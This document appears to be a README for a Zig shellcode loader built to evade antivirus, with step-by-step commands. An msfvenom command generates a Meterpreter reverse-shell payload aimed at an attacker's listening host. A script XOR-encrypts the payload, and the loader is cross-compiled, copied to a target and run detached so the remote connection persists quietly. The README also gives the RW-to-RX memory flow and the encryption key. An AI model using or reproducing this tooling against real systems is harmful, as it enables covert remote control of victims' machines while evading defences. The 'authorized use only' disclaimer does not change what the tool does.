A proof-of-concept shellcode loader demonstrating advanced evasion techniques for security research. Features external payload loading, process detachment, and multi-byte XOR encryption.
- External Payload Loading - Separates loader from encrypted shellcode
- Process Detachment - Spawns independent background process
- Multi-byte XOR - 8-byte rotating key encryption
- Memory Protection - RW → RX transition (avoids RWX)
- Cross-compilation - Build Windows binaries from Linux
- Zig 0.13.0+
- Python 3.6+
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<LHOST> LPORT=<PORT> -f raw -o shellcode.bin$ python3 shellcode_encrypter.py shellcode.binOutput: data.bin (encrypted payload)
$ zig build-exe zig_loader.zig -target x86_64-windows -O ReleaseSmall -fstrip -fsingle-threadedTransfer both zig_loader.exe and data.bin to target system:
PS C:\> .\zig_loader.exeThe loader detaches immediately, returning control to the shell while maintaining the connection in the background.
loader.exe (clean binary)
↓
Reads data.bin (encrypted)
↓
XOR decryption
↓
VirtualAlloc (RW)
↓
Copy shellcode
↓
VirtualProtect (RX)
↓
CreateProcess (detached)
↓
CreateThread → Execute
Modify the key in both files:
shellcode_encrypter.py:
xor_key = [0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0]zig_loader.zig:
const xor_key = [_]u8{ 0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0 };This tool demonstrates:
- Shellcode execution techniques
- AV evasion methodologies
- Process manipulation
- Memory management
Intended for:
- Security research
- Authorized penetration testing
- CTF competitions
- Malware analysis training
FOR AUTHORIZED USE ONLY
This tool is provided for educational and legitimate security testing purposes. Unauthorized access to computer systems is illegal. Users must obtain explicit written authorization before use. The authors assume no liability for misuse.
MIT License - See LICENSE file for details